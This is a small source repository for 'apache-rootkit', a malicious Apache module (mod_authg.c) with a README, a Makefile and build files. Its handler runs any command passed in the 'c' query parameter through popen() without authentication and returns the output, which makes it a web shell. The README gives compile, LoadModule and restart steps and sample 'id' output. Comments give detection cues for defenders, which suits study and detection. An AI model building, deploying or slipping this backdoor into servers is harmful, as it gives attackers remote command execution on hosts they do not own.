├── .deps
├── modules.mk
├── README.md
├── Makefile
└── mod_authg.c
/.deps:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/modules.mk:
--------------------------------------------------------------------------------
1 | mod_authg.la: mod_authg.slo
2 | $(SH_LINK) -rpath $(libexecdir) -module -avoid-version mod_authg.lo
3 | DISTCLEAN_TARGETS = modules.mk
4 | shared = mod_authg.la
5 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # apache-rootkit
2 | A malicious Apache module with rootkit functionality
3 | C. Papathanasiou 2015
4 |
5 | Compile by running:
6 | ```
7 | $ apxs -c -i mod_authg.c
8 | ```
9 | Then activate it in Apache's apache2.conf file for instance
10 | for the URL /authg as follows:
11 | ```
12 | # apache2.conf
13 | LoadModule authg_module modules/mod_authg.so
14 |
15 | SetHandler authg
16 |
17 | ```
18 | Then after restarting Apache via
19 | ```
20 | $ apachectl restart
21 | ```
22 | you immediately can request the URL /authg?c=cmd and watch for the
23 | output of this module. This can be achieved for instance via:
24 | ```
25 | $ lynx -mime_header http://localhost/authg?c=id
26 | ```
27 | The output should be similar to the following one:
28 | ```
29 | HTTP/1.1 200 OK
30 | Date: Thu, 19 Feb 2015 16:33:30 GMT
31 | Server: Apache/2.4.7 (Ubuntu)
32 | Content-Length: 54
33 | Connection: close
34 | Content-Type: text/html
35 |
36 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
37 | ```
38 | Created for demo purposes only, no liability accepted.
39 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | ##
2 | ## Makefile -- Build procedure for sample authg Apache module
3 | ## Autogenerated via ``apxs -n authg -g''.
4 | ##
5 |
6 | builddir=.
7 | top_srcdir=/usr/share/apache2
8 | top_builddir=/usr/share/apache2
9 | include /usr/share/apache2/build/special.mk
10 |
11 | # the used tools
12 | APXS=apxs
13 | APACHECTL=apachectl
14 |
15 | # additional defines, includes and libraries
16 | #DEFS=-Dmy_define=my_value
17 | #INCLUDES=-Imy/include/dir
18 | #LIBS=-Lmy/lib/dir -lmylib
19 |
20 | # the default target
21 | all: local-shared-build
22 |
23 | # install the shared object file into Apache
24 | install: install-modules-yes
25 |
26 | # cleanup
27 | clean:
28 | -rm -f mod_authg.o mod_authg.lo mod_authg.slo mod_authg.la
29 |
30 | # simple test
31 | test: reload
32 | lynx -mime_header http://localhost/authg
33 |
34 | # install and activate shared object by reloading Apache to
35 | # force a reload of the shared object file
36 | reload: install restart
37 |
38 | # the general Apache start/restart/stop
39 | # procedures
40 | start:
41 | $(APACHECTL) start
42 | restart:
43 | $(APACHECTL) restart
44 | stop:
45 | $(APACHECTL) stop
46 |
47 |
--------------------------------------------------------------------------------
/mod_authg.c:
--------------------------------------------------------------------------------
1 | /*
2 | ** mod_authg.c -- Apache module rootkit C. Papathanasiou (2015)
3 | ** [Semi-Autogenerated via ``apxs -n authg -g'']
4 | **
5 | ** To play with this module first compile it into a
6 | ** DSO file and install it into Apache's modules directory
7 | ** by running:
8 | **
9 | ** $ apxs -c -i mod_authg.c
10 | **
11 | ** Then activate it in Apache's apache2.conf file for instance
12 | ** for the URL /authg as follows:
13 | **
14 | ** # apache2.conf
15 | ** LoadModule authg_module modules/mod_authg.so
16 | **
17 | ** SetHandler authg
18 | **
19 | **
20 | ** Then after restarting Apache via
21 | **
22 | ** $ apachectl restart
23 | **
24 | ** you immediately can request the URL /authg?c=cmd and watch for the
25 | ** output of this module. This can be achieved for instance via:
26 | **
27 | ** $ lynx -mime_header http://localhost/authg?c=id
28 | **
29 | ** The output should be similar to the following one:
30 | **
31 | ** HTTP/1.1 200 OK
32 | ** Date: Thu, 19 Feb 2015 16:33:30 GMT
33 | ** Server: Apache/2.4.7 (Ubuntu)
34 | ** Content-Length: 54
35 | ** Connection: close
36 | ** Content-Type: text/html
37 | **
38 | ** uid=33(www-data) gid=33(www-data) groups=33(www-data)
39 | **
40 | */
41 |
42 | #include "httpd.h"
43 | #include "http_config.h"
44 | #include "http_protocol.h"
45 | #include "http_log.h"
46 | #include "ap_config.h"
47 | #include
48 | #include
49 |
/*
 * Content handler bound to "SetHandler authg".
 *
 * This is the module's web-shell entry point: the raw value of the `c`
 * query-string parameter is passed to popen() and whatever the spawned
 * shell prints on stdout is copied into the HTTP response body. There is
 * no authentication, no validation of `c`, and no logging of what was
 * run, so any client that can reach the handler executes commands with
 * the privileges of the httpd worker (the README shows uid=33 www-data).
 *
 * Defender notes (what makes this detectable):
 *  - an unexpected `LoadModule authg_module ...` line, or an unknown .so
 *    in the modules directory; `httpd -M` / `apachectl -M` lists the
 *    module as authg_module once it is loaded;
 *  - httpd worker processes spawning a shell — popen() runs the command
 *    through /bin/sh — visible in process-tree or execve audit logs;
 *  - requests whose query string carries a `c=` parameter to the path
 *    this handler is mapped to.
 * The remedy is removing the module and treating the host as compromised,
 * not hardening this function.
 *
 * @param r  the current request; only r->handler and its query string
 *           are consulted.
 * @return DECLINED unless the configured handler is "authg"; otherwise OK,
 *         even when popen() fails (the client then gets an empty 200).
 */
static int authg_handler(request_rec *r)
{
    apr_table_t *GET;            /* parsed query-string parameters */
    apr_array_header_t *POST;    /* parsed form body — filled in, never read */
    const char *c;               /* the command string, straight from the URL */
    FILE *fp;                    /* read end of the popen() pipe */
    char path[1024];             /* misnamed: holds one chunk of command output */

    /* Only act for locations configured with "SetHandler authg". */
    if (strcmp(r->handler, "authg")) {
        return DECLINED;
    }
    ap_args_to_table(r, &GET);
    /* The request body is parsed (up to 8192 bytes) but POST is never used. */
    ap_parse_form_data(r, NULL, &POST, -1, 8192);
    ap_set_content_type(r, "text/html");
    /* NULL when the parameter is absent; it is handed to popen() unchecked,
     * which POSIX leaves undefined — the observable failure depends on the
     * libc, so a probe without `c=` may surface as an odd shell error. */
    c = apr_table_get(GET, "c");
    /* Command execution: untrusted input goes directly to the shell. */
    fp = popen(c,"r");
    if (fp == NULL) {
        return OK;
    }
    /* Stream the command's stdout back in chunks of at most 1022 bytes. */
    while (fgets(path, sizeof(path)-1,fp) != NULL) {
        ap_rprintf(r,"%s",path);
    }
    pclose(fp);
    return OK;
}
74 |
/*
 * log_transaction hook. Registered in authg_register_hooks but inert:
 * it declines every request and leaves the access log untouched.
 *
 * @param r  the completed request (not examined).
 * @return DECLINED, always.
 */
static int log_handler(request_rec *r)
{
    (void)r; /* intentionally unused: nothing is logged or suppressed here */
    return DECLINED;
}
/*
 * Registered on the open_logs hook but inert: returns DECLINED and opens
 * nothing.
 * NOTE(review): ap_hook_open_logs callbacks receive (pconf, plog, ptemp,
 * server_rec *), not a request_rec *, so this signature does not match
 * the hook it is registered on — confirm against the httpd headers.
 *
 * @param r  unused.
 * @return DECLINED, always.
 */
static int log_open_handler(request_rec *r)
{
    (void)r;
    return DECLINED;
}
/*
 * Hook registration, invoked by httpd when the module is loaded.
 *
 * Wires authg_handler (the command-execution handler) into the content
 * phase and attaches two stubs to the open_logs and log_transaction hooks.
 * The stubs currently do nothing, but a reviewer should still record that
 * the module has registered itself on the logging path, since that is
 * where any later tampering with access logging would be placed.
 * NOTE(review): ap_hook_open_logs callbacks take (pconf, plog, ptemp,
 * server_rec *), not request_rec *, so log_open_handler's signature does
 * not match that hook — confirm against the httpd headers; the call should
 * at least draw an incompatible-pointer warning at build time.
 *
 * @param p  configuration pool (unused here).
 */
static void authg_register_hooks(apr_pool_t *p)
{
    ap_hook_handler(authg_handler, NULL, NULL, APR_HOOK_MIDDLE);
    ap_hook_open_logs(log_open_handler,NULL,NULL,APR_HOOK_MIDDLE);
    ap_hook_log_transaction(log_handler,NULL,NULL,APR_HOOK_MIDDLE);
}
89 |
/*
 * Module record exported to httpd. The symbol name authg_module is what
 * the LoadModule directive references and what `httpd -M` reports, which
 * makes it the simplest configuration-level indicator of this module.
 * No per-directory or per-server configuration and no directives are
 * defined: behaviour is driven entirely by SetHandler and the hooks
 * registered in authg_register_hooks.
 */
module AP_MODULE_DECLARE_DATA authg_module = {
    STANDARD20_MODULE_STUFF,
    NULL,                /* create per-dir config structures */
    NULL,                /* merge per-dir config structures */
    NULL,                /* create per-server config structures */
    NULL,                /* merge per-server config structures */
    NULL,                /* table of config file commands (none) */
    authg_register_hooks /* register hooks */
};
99 |
--------------------------------------------------------------------------------